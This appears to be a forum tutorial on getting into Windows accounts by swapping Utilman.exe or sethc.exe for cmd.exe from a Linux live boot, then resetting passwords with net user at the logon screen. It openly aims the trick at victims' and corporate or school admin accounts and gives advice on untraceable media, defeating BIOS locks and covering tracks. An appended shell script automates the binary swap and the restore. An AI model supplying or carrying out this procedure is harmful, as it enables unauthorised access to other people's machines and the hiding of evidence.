xZero

Windows account password hack/recovery [All versions]

2 posts in this topic


Forgot your password, or maybe you want to snoop where you shouldn't? No problem! Microsoft is here to help you.
An old-school trick, as old as the oldest Windows, still remains unfixed even on the most modern Windows available, Windows 10. No, it's not even fixed in the Anniversary Update (10.0.14393)...

It's a major security flaw, very easy to exploit, and users can't do ANYTHING to prevent it, except mechanically locking their computer. (Not that that is bulletproof.)

To make things even worse, no version of Windows is secure, not even the Windows Server editions! What a shame: Windows Server should be the hardest to exploit, yet an old-school trick breaks it just as easily. Of course, the trick will hardly work remotely, but if you have physical access, you're already in.
Imagine hacking a corporate server... or your school's servers... Yeah, yeah, I know, it's not always easy to get near those machines, but believe me, I've seen them easy to access in so many places.

Is your account at work limited? Use this method to hack the admin password.

There is just one problem with this method: you will not learn the password, you will reset it to whatever you like, even a blank password, so this method is not stealthy. If you hack an admin account on a corporate server, they will probably be alerted as soon as the admin fails to log in... The good thing is that you can always cover your tracks. If someone saw you, then you're probably screwed, but don't kill the witnesses! It's not worth it.

 

Before we proceed, a disclaimer

Following this tutorial is entirely your own responsibility. So if you end up in jail, kill your cat, crash your car or whatever, it's ONLY YOUR responsibility.



So how do we do it?

You will need:

  1. A Linux live distribution (one you can boot and use right away).
  2. A CD/DVD, USB stick or any other medium where you can put the OS from step 1.
    For security reasons it would be wise to use untraceable media, like a CD/DVD which you can easily discard. Any USB drive may leave a trace of its serial number on the affected machine, and that may lead directly to you (not always the case, but at the very least hide it well)!
  3. The machine you're going to use this on must allow you to boot from CD/DVD/USB.
    A locked BIOS may be a problem, but if you have privacy and time, you can open the machine and remove the CMOS battery so the BIOS configuration, password included, gets wiped clean.
  4. A brain and common sense.

Steps

  1. Before we begin, turn the Windows PC off properly. Properly means Shut down, not hibernation (a hibernated Windows leaves the NTFS volume in an unclean state and Linux will refuse to mount it read-write). A hard power off is also an option if you don't care about the possible consequences for the PC (data corruption, disk failure), although serious consequences are very rare.
  2. Once you've booted the Linux live system, go to the file manager and mount/open the disk where Windows is located. If Linux won't mount it or complains that the drive is in an unsafe state, open a terminal and type:
    sudo fdisk -l
    sudo mount -o force /dev/sdXN /mnt

    Make sure to change sdXN to whatever identifier the Windows partition has (something like sda2). You'll get that info from the first command. The force option belongs to the ntfs-3g driver and makes it mount a volume whose NTFS log is not clean.

  3. Locate the file Utilman.exe (it lives in Windows\System32 on the mounted partition).
  4. Rename it to Utilman0.exe.
  5. Duplicate/copy cmd.exe (same directory) and rename the copy to Utilman.exe.
  6. Shut down Linux.
  7. Boot Windows.
  8. At the logon screen press Win + U.
  9. A command prompt will appear. Type:
    net user YourOrVictimsPreciousUsername newpassword

    If you would rather not put the password on the command line, use an asterisk instead:
    net user YourOrVictimsPreciousUsername *

    Windows will then prompt for the new password (twice); pressing Enter at both prompts sets an empty password, unless the machine's password policy forbids it.

  10. Now boot back into Linux and repeat steps 1 and 2.

  11. Locate and delete Utilman.exe (the cmd.exe copy).

  12. Locate Utilman0.exe and rename it back to Utilman.exe.

  13. Done!

What did we do? We swapped the accessibility menu available at logon (Utilman.exe) for the command prompt (cmd.exe). That way, when we press Win + U, Windows launches our command prompt instead, and because the logon screen runs that binary as the LocalSystem account, not as the user who is about to log in, the prompt has more than enough rights to reset any local account's password with net user.

Instead of Linux there are other ways to boot the machine and do the same steps, but this one is tested.

There is also a tool called chntpw, available as a standalone bootable image or as a Linux package. It's much simpler, but I discourage using it, as it doesn't support all versions of Windows and it may damage/affect other user accounts.

Tips:

  • If you know how to use the Linux terminal, all of the above steps can be done in half the time.
  • If the Utilman.exe method doesn't work, e.g. the keyboard has no Win key, you can do all the same steps but swap sethc.exe instead of Utilman.exe. Then, on the logon screen, press Shift five times in a row until the command prompt appears. sethc.exe is the application launched by the annoying Sticky Keys (Shift) function. If Sticky Keys is disabled this won't work, but you could in theory swap the command prompt in for any other application that is bound to some key combination at the logon screen.

 

Happy hacking!
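The Linux side of the procedure (steps 3–5 and 11–12) and its sethc.exe variant from the tips, as an added shell example that is not part of the original post. It assumes the Windows partition is already mounted read-write at the mount point you pass in, as in step 2, and that the binaries live in Windows\System32, where Windows keeps Utilman.exe, sethc.exe and cmd.exe. The function and script names are my own. NTFS mounted under Linux is case-sensitive, so the script looks the files up case-insensitively rather than trusting the exact spelling, and it refuses to swap twice, since a second swap would overwrite the only copy of the real binary with cmd.exe.

```shell
#!/bin/sh
# accessibility_swap.sh (hypothetical name): plant cmd.exe as a logon-screen
# accessibility binary, and undo it again. Added example, not the post's code.
# Usage: accessibility_swap.sh swap    MOUNTPOINT [utilman.exe|sethc.exe]
#        accessibility_swap.sh restore MOUNTPOINT [utilman.exe|sethc.exe]
# Assumes MOUNTPOINT is the Windows volume mounted read-write (step 2).

# Print the first entry in directory $1 whose name equals $2 ignoring case.
# -mindepth 1 keeps the directory itself out of the match.
find_ci() {
    find "$1" -mindepth 1 -maxdepth 1 -iname "$2" -print 2>/dev/null | head -n 1
}

# Strip a trailing .exe (any case) from a path, e.g. .../Utilman.exe -> .../Utilman
strip_exe() {
    printf '%s\n' "$1" | sed 's/\.[eE][xX][eE]$//'
}

# Resolve Windows\System32 under the mount point, tolerating case differences.
system32_dir() {
    win=$(find_ci "$1" Windows)
    [ -n "$win" ] || return 1
    s32=$(find_ci "$win" System32)
    [ -n "$s32" ] || return 1
    printf '%s\n' "$s32"
}

# swap_accessibility MOUNTPOINT NAME: move NAME aside as NAME0.exe
# (Utilman.exe -> Utilman0.exe) and put a copy of cmd.exe in its place.
swap_accessibility() {
    s32=$(system32_dir "$1") || { echo "System32 not found under $1" >&2; return 1; }
    target=$(find_ci "$s32" "$2")
    cmd=$(find_ci "$s32" cmd.exe)
    [ -n "$target" ] && [ -n "$cmd" ] || { echo "$2 or cmd.exe missing in $s32" >&2; return 1; }
    backup="$(strip_exe "$target")0.exe"
    # Refuse to run twice: the backup is the only copy of the real binary,
    # and a second swap would replace it with cmd.exe.
    if [ -e "$backup" ]; then
        echo "$backup already exists; already swapped? refusing" >&2
        return 1
    fi
    mv "$target" "$backup" && cp "$cmd" "$target"
}

# restore_accessibility MOUNTPOINT NAME: delete the planted cmd.exe copy and
# move the NAME0.exe backup back to its original name.
restore_accessibility() {
    s32=$(system32_dir "$1") || { echo "System32 not found under $1" >&2; return 1; }
    backup=$(find_ci "$s32" "$(strip_exe "$2")0.exe")
    [ -n "$backup" ] || { echo "no backup for $2 in $s32; nothing to restore" >&2; return 1; }
    planted=$(find_ci "$s32" "$2")
    [ -n "$planted" ] && rm -f "$planted"
    # .../Utilman0.exe -> .../Utilman.exe
    mv "$backup" "${backup%0.*}.exe"
}

# Entry point when run as a script; does nothing when no arguments are given.
case "${1:-}" in
    swap)    swap_accessibility "$2" "${3:-utilman.exe}" ;;
    restore) restore_accessibility "$2" "${3:-utilman.exe}" ;;
    *)       [ $# -eq 0 ] || echo "usage: $0 swap|restore MOUNTPOINT [NAME]" >&2 ;;
esac
```

Run `sh accessibility_swap.sh swap /mnt utilman.exe` before rebooting into Windows and `sh accessibility_swap.sh restore /mnt utilman.exe` afterwards (or `sethc.exe` for the Sticky Keys variant). The script only helps if step 2 succeeded: on a BitLocker-encrypted volume there is nothing to mount, so neither the swap nor the restore can touch System32.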